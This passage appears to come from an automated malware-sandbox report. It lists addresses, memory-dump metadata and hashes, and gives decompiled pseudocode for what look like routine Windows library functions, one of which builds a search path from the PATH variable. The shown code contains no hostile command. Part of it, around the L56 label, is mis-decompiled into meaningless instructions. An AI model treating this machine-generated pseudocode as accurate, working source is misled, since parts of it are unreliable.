                                      0x053a495f
                                      0x053a4965
                                      0x053a4969
                                      0x053a49ba
                                      0x053a49ba
                                      0x053a49c1
                                      0x053a49c5
                                      0x053a49cc
                                      0x053a49d4
                                      0x053a49d7
                                      0x053a49da
                                      0x053a49e4
                                      0x053a49e5
                                      0x053a49f3
                                      0x053a4a02
                                      0x00000000
                                      0x053a4a02
                                      0x053a4972
                                      0x053a4974
                                      0x00000000
                                      0x00000000
                                      0x053a4976
                                      0x053a4979
                                      0x053a4982
                                      0x053a4983
                                      0x053a4984
                                      0x053a498b
                                      0x053a498d
                                      0x053a4991
                                      0x053a4993
                                      0x053a4999
                                      0x053a499d
                                      0x053a49a2
                                      0x053a49a2
                                      0x053a49a2
                                      0x053a4999
                                      0x053a49ac
                                      0x00000000
                                      0x053a49b3
                                      0x053a48f8
                                      0x053a48fe
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053a48fe
                                      0x053a4895
                                      0x053a489c
                                      0x053a48ad
                                      0x053a48b2
                                      0x053a48b5
                                      0x053a48b7
                                      0x053a48ba
                                      0x053a48bc
                                      0x053a48c6
                                      0x053a48c6
                                      0x053a48cb
                                      0x053a48d1
                                      0x053a48d4
                                      0x053a48d8
                                      0x053a48d8
                                      0x00000000
                                      0x053a48d8
                                      0x053a48be
                                      0x053a48c0
                                      0x00000000
                                      0x00000000
                                      0x053a48c2
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053a48c4
                                      0x00000000
                                      0x053a4882
                                      0x053a487b
                                      0x053a4904
                                      0x053a4906
                                      0x00000000
                                      0x00000000
                                      0x053a4908
                                      0x053a490e
                                      0x00000000
                                      0x00000000
                                      0x053a4910
                                      0x053a4917
                                      0x053a4917
                                      0x00000000
                                      0x053a4917
                                      0x0534b1ba
                                      0x053a47f9
                                      0x053a47fc
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053a47fc
                                      0x0534b1c0
                                      0x0534b1c0
                                      0x0534b1c3
                                      0x0534b1cb
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: _vswprintf_s
                                      • String ID:
                                      • API String ID: 677850445-0
                                      • Opcode ID: 4fbb5db3b199a9dec36c3d15dcd42067d96eff502e6d4658ce95e7ec106a9d52
                                      • Instruction ID: 5b176b7b7cd5f2f2243e0ff02b38978eba0f78ae71e0fa5c7952bf52a8fe14c1
                                      • Opcode Fuzzy Hash: 4fbb5db3b199a9dec36c3d15dcd42067d96eff502e6d4658ce95e7ec106a9d52
                                      • Instruction Fuzzy Hash: 1C51FF72E002598EDF36DF64C845BBEBBB5FF00710F2041ADD85AAB281D7B589458B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0536B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 76%
                                      			E0536B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x543d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E05367D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E05418CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E05389E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0538B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0538CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E05367D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E05418F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0538AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x5438628; // 0x0
								_v68 = _t77;
								_t78 =  *0x543862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x5438628; // 0x0
							_t116 =  *0x543862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                      0x0536b94c
                                      0x0536b956
                                      0x0536b95c
                                      0x0536b95e
                                      0x0536b964
                                      0x0536b969
                                      0x0536b96d
                                      0x0536b96d
                                      0x0536b970
                                      0x0536b974
                                      0x0536b97a
                                      0x0536badf
                                      0x0536badf
                                      0x0536bae2
                                      0x0536bae4
                                      0x0536bae6
                                      0x0536baf0
                                      0x053b2cb8
                                      0x0536baf6
                                      0x0536baf6
                                      0x0536baf6
                                      0x0536bafd
                                      0x0536bb1f
                                      0x0536bb1f
                                      0x0536baff
                                      0x0536bb00
                                      0x0536bb00
                                      0x0536bb03
                                      0x0536bb03
                                      0x0536bacb
                                      0x0536bacf
                                      0x0536bad0
                                      0x0536bad1
                                      0x0536badc
                                      0x0536badc
                                      0x0536b980
                                      0x0536b980
                                      0x0536b988
                                      0x0536b98b
                                      0x0536b98d
                                      0x0536b990
                                      0x0536b993
                                      0x0536b999
                                      0x0536b99b
                                      0x0536b9a1
                                      0x0536b9a5
                                      0x0536b9aa
                                      0x0536b9b0
                                      0x0536b9bb
                                      0x0536b9c0
                                      0x0536b9c3
                                      0x0536b9ca
                                      0x0536b9cc
                                      0x0536b9cf
                                      0x0536b9d3
                                      0x0536b9d7
                                      0x0536ba94
                                      0x0536ba94
                                      0x0536ba98
                                      0x0536baa3
                                      0x053b2ccb
                                      0x0536baa9
                                      0x0536baa9
                                      0x0536baa9
                                      0x0536bab1
                                      0x053b2cd5
                                      0x053b2cdd
                                      0x053b2cdd
                                      0x0536babb
                                      0x0536babc
                                      0x0536bac2
                                      0x0536bac3
                                      0x0536bac3
                                      0x0536bac6
                                      0x00000000
                                      0x0536b9dd
                                      0x0536b9dd
                                      0x0536b9e7
                                      0x0536b9e7
                                      0x0536b9ec
                                      0x0536b9ec
                                      0x0536b9f1
                                      0x0536b9f5
                                      0x0536b9fa
                                      0x0536ba00
                                      0x0536ba0c
                                      0x0536ba10
                                      0x0536ba10
                                      0x0536ba12
                                      0x0536ba18
                                      0x00000000
                                      0x00000000
                                      0x0536bb26
                                      0x0536bb26
                                      0x0536ba1e
                                      0x0536ba1e
                                      0x0536ba23
                                      0x0536ba25
                                      0x0536ba2c
                                      0x0536ba30
                                      0x0536ba35
                                      0x0536ba35
                                      0x0536ba41
                                      0x0536ba46
                                      0x0536ba4c
                                      0x0536ba50
                                      0x0536ba54
                                      0x0536ba6a
                                      0x0536ba6e
                                      0x0536ba70
                                      0x0536ba74
                                      0x0536ba78
                                      0x0536ba7a
                                      0x0536ba7c
                                      0x0536ba8e
                                      0x0536ba90
                                      0x0536ba92
                                      0x0536bb14
                                      0x0536bb14
                                      0x0536bb16
                                      0x0536bb16
                                      0x00000000
                                      0x0536ba7c
                                      0x0536bb0a
                                      0x0536bb0d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0536bb0f

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0536B9A5
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 885266447-0
                                      • Opcode ID: b81e411c224d96df659d808f75ed2f2d9dff61be64c9b215d46e9e3bff05ad01
                                      • Instruction ID: 71f979424c364c5825a14e86a3293199a306e74406a319ce8c0081a092951336
                                      • Opcode Fuzzy Hash: b81e411c224d96df659d808f75ed2f2d9dff61be64c9b215d46e9e3bff05ad01
                                      • Instruction Fuzzy Hash: CB514771A18300CFC724DF29C09092AFBEABB88640F14896EF986C7758D770E844CF92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05372581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 84%
                                      			E05372581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t229;
				signed int _t233;
				signed int _t236;
				signed int _t238;
				signed int _t246;
				signed int _t248;
				intOrPtr _t250;
				signed int _t253;
				signed int _t260;
				signed int _t263;
				signed int _t271;
				intOrPtr _t277;
				signed int _t279;
				signed int _t281;
				void* _t282;
				signed int _t283;
				unsigned int _t286;
				signed int _t290;
				signed int _t292;
				signed int _t296;
				intOrPtr _t309;
				signed int _t318;
				signed int _t320;
				signed int _t321;
				signed int _t325;
				signed int _t326;
				void* _t328;
				void* _t329;
				signed int _t330;
				signed int _t332;
				signed int _t334;
				void* _t335;

				_t332 = _t334;
				_t335 = _t334 - 0x4c;
				_v8 =  *0x543d360 ^ _t332;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t325 = 0x543b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t286 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t277 = 0x48;
				_t306 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t318 = 0;
				_v37 = _t306;
				if(_v48 <= 0) {
					L16:
					_t45 = _t277 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t326 = 0xc0000106;
						goto L32;
					} else {
						_t325 = L05364620(_t286,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t277);
						_v52 = _t325;
						__eflags = _t325;
						if(_t325 == 0) {
							_t326 = 0xc0000017;
							goto L32;
						} else {
							 *(_t325 + 0x44) =  *(_t325 + 0x44) & 0x00000000;
							_t50 = _t325 + 0x48; // 0x48
							_t320 = _t50;
							_t306 = _v32;
							 *((intOrPtr*)(_t325 + 0x3c)) = _t277;
							_t279 = 0;
							 *((short*)(_t325 + 0x30)) = _v48;
							__eflags = _t306;
							if(_t306 != 0) {
								 *(_t325 + 0x18) = _t320;
								__eflags = _t306 - 0x5438478;
								 *_t325 = ((0 | _t306 == 0x05438478) - 0x00000001 & 0xfffffffb) + 7;
								E0538F3E0(_t320,  *((intOrPtr*)(_t306 + 4)),  *_t306 & 0x0000ffff);
								_t306 = _v32;
								_t335 = _t335 + 0xc;
								_t279 = 1;
								__eflags = _a8;
								_t320 = _t320 + (( *_t306 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t271 = E053D39F2(_t320);
									_t306 = _v32;
									_t320 = _t271;
								}
							}
							_t290 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t326 = _v68;
								__eflags = 0;
								 *((short*)(_t320 - 2)) = 0;
								goto L32;
							} else {
								_t281 = _t325 + _t279 * 4;
								_v56 = _t281;
								do {
									__eflags = _t306;
									if(_t306 != 0) {
										_t229 =  *(_v60 + _t290 * 4);
										__eflags = _t229;
										if(_t229 == 0) {
											goto L30;
										} else {
											__eflags = _t229 == 5;
											if(_t229 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t281 =  *(_v60 + _t290 * 4);
										 *(_t281 + 0x18) = _t320;
										_t233 =  *(_v60 + _t290 * 4);
										__eflags = _t233 - 8;
										if(_t233 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t233 * 4 +  &M05372959))) {
												case 0:
													__ax =  *0x5438488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0538F3E0(__edi,  *0x543848c, __ax & 0x0000ffff);
														__eax =  *0x5438488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0538F3E0(_t320, _v80, _v64);
													_t266 = _v64;
													goto L26;
												case 2:
													 *0x5438480 & 0x0000ffff = E0538F3E0(__edi,  *0x5438484,  *0x5438480 & 0x0000ffff);
													__eax =  *0x5438480 & 0x0000ffff;
													__eax = ( *0x5438480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0538F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0538F3E0(_t320, _v76, _v36);
														_t266 = _v36;
													}
													L26:
													_t335 = _t335 + 0xc;
													_t320 = _t320 + (_t266 >> 1) * 2 + 2;
													__eflags = _t320;
													L27:
													_push(0x3b);
													_pop(_t268);
													 *((short*)(_t320 - 2)) = _t268;
													goto L28;
												case 6:
													__ebx =  *0x543575c;
													__eflags = __ebx - 0x543575c;
													if(__ebx != 0x543575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0538F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x543575c;
														} while (__ebx != 0x543575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x5438478 & 0x0000ffff = E0538F3E0(__edi,  *0x543847c,  *0x5438478 & 0x0000ffff);
													__eax =  *0x5438478 & 0x0000ffff;
													__eax = ( *0x5438478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E053D39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x5436e58 & 0x0000ffff = E0538F3E0(__edi,  *0x5436e5c,  *0x5436e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x5436e58 & 0x0000ffff;
													__eax = ( *0x5436e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t290 = _v16;
													_t306 = _v32;
													L29:
													_t281 = _t281 + 4;
													__eflags = _t281;
													_v56 = _t281;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t290 = _t290 + 1;
									_v16 = _t290;
									__eflags = _t290 - _v48;
								} while (_t290 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t233 =  *(_v60 + _t318 * 4);
						if(_t233 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t233 * 4 +  &M05372935))) {
							case 0:
								__ax =  *0x5438488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t306 =  &_v64;
								_v80 = E05372E3E(0,  &_v64);
								_t277 = _t277 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x5438480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x5438480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0535EEF0(0x54379a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0535EB70(__ecx, 0x54379a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t207 = _v72;
											__eflags = _t207;
											if(_t207 != 0) {
												L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t207);
											}
											_t208 = _v52;
											__eflags = _t208;
											if(_t208 != 0) {
												__eflags = _t326;
												if(_t326 < 0) {
													L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
													_t208 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t286 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x5437b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L05364620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0535EB70(__ecx, 0x54379a0);
										__eax = _v52;
										L36:
										_pop(_t319);
										_pop(_t327);
										__eflags = _v8 ^ _t332;
										_pop(_t278);
										return E0538B640(_t208, _t278, _v8 ^ _t332, _t306, _t319, _t327);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t273 = _v56;
								if(_v56 != 0) {
									_t306 =  &_v36;
									_t275 = E05372E3E(_t273,  &_v36);
									_t286 = _v36;
									_v76 = _t275;
								}
								if(_t286 == 0) {
									goto L44;
								} else {
									_t277 = _t277 + 2 + _t286;
								}
								goto L14;
							case 6:
								__eax =  *0x5435764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x5438478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x5438478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x5436e58 & 0x0000ffff;
								__eax = ( *0x5436e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t318 = _t318 + 1;
								if(_t318 >= _v48) {
									goto L16;
								} else {
									_t306 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("aaa");
					asm("loopne 0x29");
					asm("aaa");
					_t328 = _t325 + 1;
					 *_t320 =  *_t320 - _t306;
					_t236 = _t233 + 0xfa57499;
					ds = 0x25;
					_pop(_t282);
					__eflags = _t236 -  *0x5372894;
					 *_t320 =  *_t320 - _t328;
					_t238 = (_t236 ^ 0x02053b5b) + 0x5372880;
					asm("aaa");
					_t329 = _t328 - 1;
					 *_t320 =  *_t320 - (_t238 *  *_t320 >> 0x20);
					asm("fcomp dword [ebx+0x3b]");
					__eflags = (_t238 *  *_t320 + 0xfa5782f ^ 0x0000005c) -  *0xcccccccc;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x541ff00);
					E0539D08C(_t282, _t320, _t329);
					_v44 =  *[fs:0x18];
					_t321 = 0;
					 *_a24 = 0;
					_t283 = _a12;
					__eflags = _t283;
					if(_t283 == 0) {
						_t246 = 0xc0000100;
					} else {
						_v8 = 0;
						_t330 = 0xc0000100;
						_v52 = 0xc0000100;
						_t248 = 4;
						while(1) {
							_v40 = _t248;
							__eflags = _t248;
							if(_t248 == 0) {
								break;
							}
							_t296 = _t248 * 0xc;
							_v48 = _t296;
							__eflags = _t283 -  *((intOrPtr*)(_t296 + 0x5321664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t263 = E0538E5C0(_a8,  *((intOrPtr*)(_t296 + 0x5321668)), _t283);
									_t335 = _t335 + 0xc;
									__eflags = _t263;
									if(__eflags == 0) {
										_t330 = E053C51BE(_t283,  *((intOrPtr*)(_v48 + 0x532166c)), _a16, _t321, _t330, __eflags, _a20, _a24);
										_v52 = _t330;
										break;
									} else {
										_t248 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t248 = _t248 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t330;
						__eflags = _t330;
						if(_t330 < 0) {
							__eflags = _t330 - 0xc0000100;
							if(_t330 == 0xc0000100) {
								_t292 = _a4;
								__eflags = _t292;
								if(_t292 != 0) {
									_v36 = _t292;
									__eflags =  *_t292 - _t321;
									if( *_t292 == _t321) {
										_t330 = 0xc0000100;
										goto L76;
									} else {
										_t309 =  *((intOrPtr*)(_v44 + 0x30));
										_t250 =  *((intOrPtr*)(_t309 + 0x10));
										__eflags =  *((intOrPtr*)(_t250 + 0x48)) - _t292;
										if( *((intOrPtr*)(_t250 + 0x48)) == _t292) {
											__eflags =  *(_t309 + 0x1c);
											if( *(_t309 + 0x1c) == 0) {
												L106:
												_t330 = E05372AE4( &_v36, _a8, _t283, _a16, _a20, _a24);
												_v32 = _t330;
												__eflags = _t330 - 0xc0000100;
												if(_t330 != 0xc0000100) {
													goto L69;
												} else {
													_t321 = 1;
													_t292 = _v36;
													goto L75;
												}
											} else {
												_t253 = E05356600( *(_t309 + 0x1c));
												__eflags = _t253;
												if(_t253 != 0) {
													goto L106;
												} else {
													_t292 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t330 = E05372C50(_t292, _a8, _t283, _a16, _a20, _a24, _t321);
											L76:
											_v32 = _t330;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0535EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t330 = _a24;
									_t260 = E05372AE4( &_v36, _a8, _t283, _a16, _a20, _t330);
									_v32 = _t260;
									__eflags = _t260 - 0xc0000100;
									if(_t260 == 0xc0000100) {
										_v32 = E05372C50(_v36, _a8, _t283, _a16, _a20, _t330, 1);
									}
									_v8 = _t321;
									E05372ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t246 = _t330;
					}
					L70:
					return E0539D0D1(_t246);
				}
				L108:
			}





















































                                      0x05372584
                                      0x05372586
                                      0x05372590
                                      0x05372596
                                      0x05372597
                                      0x05372598
                                      0x05372599
                                      0x0537259e
                                      0x053725a4
                                      0x053725a9
                                      0x053725ac
                                      0x053725ae
                                      0x053725b1
                                      0x053725b2
                                      0x053725b5
                                      0x053725b8
                                      0x053725bb
                                      0x053725bc
                                      0x053725bf
                                      0x053725c2
                                      0x053725c5
                                      0x053725c6
                                      0x053725cb
                                      0x053725ce
                                      0x053725d8
                                      0x053725dd
                                      0x053725de
                                      0x053725e1
                                      0x053725e3
                                      0x053725e9
                                      0x053726da
                                      0x053726da
                                      0x053726dd
                                      0x053726e2
                                      0x053b5b56
                                      0x00000000
                                      0x053726e8
                                      0x053726f9
                                      0x053726fb
                                      0x053726fe
                                      0x05372700
                                      0x053b5b60
                                      0x00000000
                                      0x05372706
                                      0x05372706
                                      0x0537270a
                                      0x0537270a
                                      0x0537270d
                                      0x05372713
                                      0x05372716
                                      0x05372718
                                      0x0537271c
                                      0x0537271e
                                      0x053b5b6c
                                      0x053b5b6f
                                      0x053b5b7f
                                      0x053b5b89
                                      0x053b5b8e
                                      0x053b5b93
                                      0x053b5b96
                                      0x053b5b9c
                                      0x053b5ba0
                                      0x053b5ba3
                                      0x053b5bab
                                      0x053b5bb0
                                      0x053b5bb3
                                      0x053b5bb3
                                      0x053b5ba3
                                      0x05372724
                                      0x05372726
                                      0x05372729
                                      0x0537272c
                                      0x0537279d
                                      0x0537279d
                                      0x053727a0
                                      0x053727a2
                                      0x00000000
                                      0x0537272e
                                      0x0537272e
                                      0x05372731
                                      0x05372734
                                      0x05372734
                                      0x05372736
                                      0x053b5bc1
                                      0x053b5bc1
                                      0x053b5bc4
                                      0x00000000
                                      0x053b5bca
                                      0x053b5bca
                                      0x053b5bcd
                                      0x00000000
                                      0x053b5bd3
                                      0x00000000
                                      0x053b5bd3
                                      0x053b5bcd
                                      0x0537273c
                                      0x0537273c
                                      0x05372742
                                      0x05372747
                                      0x0537274a
                                      0x0537274d
                                      0x05372750
                                      0x00000000
                                      0x05372756
                                      0x05372756
                                      0x00000000
                                      0x05372902
                                      0x05372908
                                      0x0537290b
                                      0x00000000
                                      0x05372911
                                      0x0537291c
                                      0x05372921
                                      0x00000000
                                      0x05372921
                                      0x00000000
                                      0x00000000
                                      0x05372880
                                      0x05372887
                                      0x0537288c
                                      0x00000000
                                      0x00000000
                                      0x05372805
                                      0x0537280a
                                      0x05372814
                                      0x05372816
                                      0x00000000
                                      0x00000000
                                      0x0537281e
                                      0x05372821
                                      0x05372823
